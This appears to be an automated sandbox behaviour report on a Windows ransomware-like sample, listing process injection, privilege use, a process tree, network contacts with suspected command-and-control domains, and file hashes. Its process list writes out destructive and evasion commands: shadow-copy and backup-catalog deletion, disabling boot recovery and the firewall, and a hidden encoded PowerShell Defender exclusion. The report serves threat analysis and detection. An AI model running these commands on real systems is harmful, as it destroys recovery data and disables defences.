N/A N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Roaming\usbitrg N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\C78B.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2700 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe
PID 2700 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe
PID 2700 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe
PID 2700 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe
PID 2700 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe
PID 2700 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe
PID 3200 wrote to memory of 2976 N/A N/A C:\Users\Admin\AppData\Local\Temp\C78B.exe
PID 3200 wrote to memory of 2976 N/A N/A C:\Users\Admin\AppData\Local\Temp\C78B.exe
PID 3200 wrote to memory of 1100 N/A N/A C:\Users\Admin\AppData\Local\Temp\CA4B.exe
PID 3200 wrote to memory of 1100 N/A N/A C:\Users\Admin\AppData\Local\Temp\CA4B.exe
PID 3200 wrote to memory of 1100 N/A N/A C:\Users\Admin\AppData\Local\Temp\CA4B.exe
PID 3200 wrote to memory of 3184 N/A N/A C:\Users\Admin\AppData\Local\Temp\CCBD.exe
PID 3200 wrote to memory of 3184 N/A N/A C:\Users\Admin\AppData\Local\Temp\CCBD.exe
PID 3200 wrote to memory of 3184 N/A N/A C:\Users\Admin\AppData\Local\Temp\CCBD.exe
PID 3200 wrote to memory of 1060 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1060 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1060 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1060 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 1100 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\CA4B.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1100 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\CA4B.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1100 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\CA4B.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3200 wrote to memory of 4504 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 4504 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 4504 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 5088 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 5088 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 5088 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 5088 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1324 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1324 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1324 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1324 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 404 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 404 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 404 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 404 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 4276 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 4276 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 4276 N/A N/A C:\Windows\explorer.exe
PID 3184 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\CCBD.exe C:\Windows\system32\cmd.exe
PID 3184 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\CCBD.exe C:\Windows\system32\cmd.exe
PID 3184 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\CCBD.exe C:\Windows\system32\cmd.exe
PID 3184 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\CCBD.exe C:\Windows\system32\cmd.exe
PID 3200 wrote to memory of 3532 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3532 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3532 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3532 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1468 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 1468 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 1468 N/A N/A C:\Windows\explorer.exe
PID 2292 wrote to memory of 3208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2292 wrote to memory of 3208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3200 wrote to memory of 3708 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3708 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3708 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3708 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 372 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 372 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3200 wrote to memory of 3692 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 3692 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 3692 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 2396 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2396 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2396 N/A N/A C:\Windows\SysWOW64\explorer.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe

"C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe"

C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe

"C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe"

C:\Users\Admin\AppData\Local\Temp\C78B.exe

C:\Users\Admin\AppData\Local\Temp\C78B.exe

C:\Users\Admin\AppData\Local\Temp\CA4B.exe

C:\Users\Admin\AppData\Local\Temp\CA4B.exe

C:\Users\Admin\AppData\Local\Temp\CCBD.exe

C:\Users\Admin\AppData\Local\Temp\CCBD.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\Temp\CCBD.exe

"C:\Users\Admin\AppData\Local\Temp\CCBD.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1180 -ip 1180

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 460

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Users\Admin\AppData\Roaming\usbitrg

C:\Users\Admin\AppData\Roaming\usbitrg

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe

C:\Users\Admin\AppData\Roaming\usbitrg

C:\Users\Admin\AppData\Roaming\usbitrg

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Users\Admin\AppData\Roaming\Name\Target.exe

C:\Users\Admin\AppData\Roaming\Name\Target.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 52.152.110.14:443 tcp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 52.152.110.14:443 tcp
US 8.8.8.8:53 serverlogs37.xyz udp
EE 5.45.127.9:80 serverlogs37.xyz tcp
US 8.8.8.8:53 admlogs25.xyz udp
EE 159.253.18.136:80 admlogs25.xyz tcp
US 8.8.8.8:53 9.127.45.5.in-addr.arpa udp
US 8.8.8.8:53 136.18.253.159.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
EE 5.45.127.9:80 serverlogs37.xyz tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
RU 91.215.85.210:51186 91.215.85.210 tcp
US 8.8.8.8:53 210.85.215.91.in-addr.arpa udp
US 52.152.110.14:443 tcp
US 8.8.8.8:53 44.8.109.52.in-addr.arpa udp
US 52.152.110.14:443 tcp
FI 79.137.206.188:46578 tcp
US 8.8.8.8:53 188.206.137.79.in-addr.arpa udp
US 52.152.110.14:443 tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 93.184.220.29:80 tcp
US 93.184.220.29:80 tcp
US 93.184.221.240:80 tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 204.79.197.203:80 tcp
US 52.152.110.14:443 tcp
EE 5.45.127.9:80 serverlogs37.xyz tcp
US 52.152.110.14:443 tcp
US 52.152.110.14:443 tcp

Files

memory/2700-133-0x0000000002660000-0x0000000002675000-memory.dmp

memory/3816-134-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2700-135-0x0000000002680000-0x0000000002689000-memory.dmp

memory/3816-136-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3816-138-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3200-137-0x00000000012A0000-0x00000000012B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C78B.exe

MD5 e7ac55d61ab9cfcf180c92c1381a2fa1
SHA1 f79fe555c492a9effe26ead87ec7eb3c53899083
SHA256 afddec37cdc1d196a1136e2252e925c0dcfe587963069d78775e0f174ae9cfe3
SHA512 e3fa85d3af3625384ecea090a7c205325825a1b91ad43e1f86f56a719ad733d71b4be9c34edd03d8ff774e28b3feb605dc073f66f4a01359f8e4bad5b8bcfae2

C:\Users\Admin\AppData\Local\Temp\C78B.exe

MD5 e7ac55d61ab9cfcf180c92c1381a2fa1
SHA1 f79fe555c492a9effe26ead87ec7eb3c53899083
SHA256 afddec37cdc1d196a1136e2252e925c0dcfe587963069d78775e0f174ae9cfe3
SHA512 e3fa85d3af3625384ecea090a7c205325825a1b91ad43e1f86f56a719ad733d71b4be9c34edd03d8ff774e28b3feb605dc073f66f4a01359f8e4bad5b8bcfae2

memory/2976-152-0x000001EAA0040000-0x000001EAA02E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CA4B.exe

MD5 d1f12c03b8ce33b36d8423b057c7d6c5
SHA1 d6d0631a1f95e3972a803ed1c57b120815b2b5cf
SHA256 c6bd5b8e14551eb899bbe4decb6942581d28b2a42b159146bbc28316e6e14a64
SHA512 43b51f630d631d4f5cac97242595b25d07306280e183c22821f351af1fc2fc118b836df8bd8e06984f5e0cb21b25954dbd335666bd2cd2c5b98b22948bedbf41

C:\Users\Admin\AppData\Local\Temp\CA4B.exe

MD5 d1f12c03b8ce33b36d8423b057c7d6c5
SHA1 d6d0631a1f95e3972a803ed1c57b120815b2b5cf
SHA256 c6bd5b8e14551eb899bbe4decb6942581d28b2a42b159146bbc28316e6e14a64
SHA512 43b51f630d631d4f5cac97242595b25d07306280e183c22821f351af1fc2fc118b836df8bd8e06984f5e0cb21b25954dbd335666bd2cd2c5b98b22948bedbf41

memory/1100-157-0x0000000000040000-0x000000000007E000-memory.dmp

memory/2976-158-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/2976-160-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/1100-159-0x0000000004FC0000-0x0000000005564000-memory.dmp

memory/2976-162-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/2976-164-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/1100-166-0x0000000004AB0000-0x0000000004B42000-memory.dmp

memory/2976-169-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/2976-174-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CCBD.exe

MD5 2809e15a3a54484e042fe65fffd17409
SHA1 4a8f0331abaf8f629b3c8220f0d55339cfa30223
SHA256 518544e56e8ccee401ffa1b0a01a10ce23e49ec21ec441c6c7c3951b01c1b19c
SHA512 698e16fd67861377e2ccaace4d0e1a619a8b7c68e8aefc4090e9d1cbbcdfb8d8aede76f9e63f81479f5a035e8008699a4d7175da6248e6e49eb7c81b3dba30c3

memory/2976-177-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CCBD.exe

MD5 2809e15a3a54484e042fe65fffd17409
SHA1 4a8f0331abaf8f629b3c8220f0d55339cfa30223
SHA256 518544e56e8ccee401ffa1b0a01a10ce23e49ec21ec441c6c7c3951b01c1b19c
SHA512 698e16fd67861377e2ccaace4d0e1a619a8b7c68e8aefc4090e9d1cbbcdfb8d8aede76f9e63f81479f5a035e8008699a4d7175da6248e6e49eb7c81b3dba30c3

memory/2976-179-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/1100-181-0x0000000004C20000-0x0000000004C30000-memory.dmp

memory/3184-183-0x0000000000B60000-0x0000000000B6F000-memory.dmp

memory/2976-185-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/2976-188-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/1060-186-0x0000000000C00000-0x0000000000C6B000-memory.dmp

memory/2976-190-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/1100-184-0x0000000004A40000-0x0000000004A4A000-memory.dmp

memory/2976-192-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CCBD.exe

MD5 2809e15a3a54484e042fe65fffd17409
SHA1 4a8f0331abaf8f629b3c8220f0d55339cfa30223
SHA256 518544e56e8ccee401ffa1b0a01a10ce23e49ec21ec441c6c7c3951b01c1b19c
SHA512 698e16fd67861377e2ccaace4d0e1a619a8b7c68e8aefc4090e9d1cbbcdfb8d8aede76f9e63f81479f5a035e8008699a4d7175da6248e6e49eb7c81b3dba30c3

memory/2976-196-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/1060-182-0x0000000000C00000-0x0000000000C6B000-memory.dmp

memory/2976-199-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/4504-203-0x0000000000EB0000-0x0000000000EBC000-memory.dmp

memory/228-198-0x00000000022D0000-0x0000000002306000-memory.dmp

memory/228-205-0x0000000004DC0000-0x00000000053E8000-memory.dmp

memory/2976-206-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/2976-211-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/4504-212-0x0000000000EB0000-0x0000000000EBC000-memory.dmp

memory/228-228-0x0000000002350000-0x0000000002360000-memory.dmp

memory/228-231-0x0000000002350000-0x0000000002360000-memory.dmp

memory/2976-230-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/2976-233-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/228-235-0x0000000004C40000-0x0000000004C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ueulrkzs.0m4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/228-243-0x0000000004CE0000-0x0000000004D46000-memory.dmp

memory/228-249-0x00000000056E0000-0x0000000005746000-memory.dmp

memory/2976-250-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/2976-237-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/2976-252-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/5088-236-0x00000000005D0000-0x00000000005D9000-memory.dmp

memory/2976-254-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/2976-256-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

memory/2976-217-0x000001EABA7D0000-0x000001EABA918000-memory.dmp

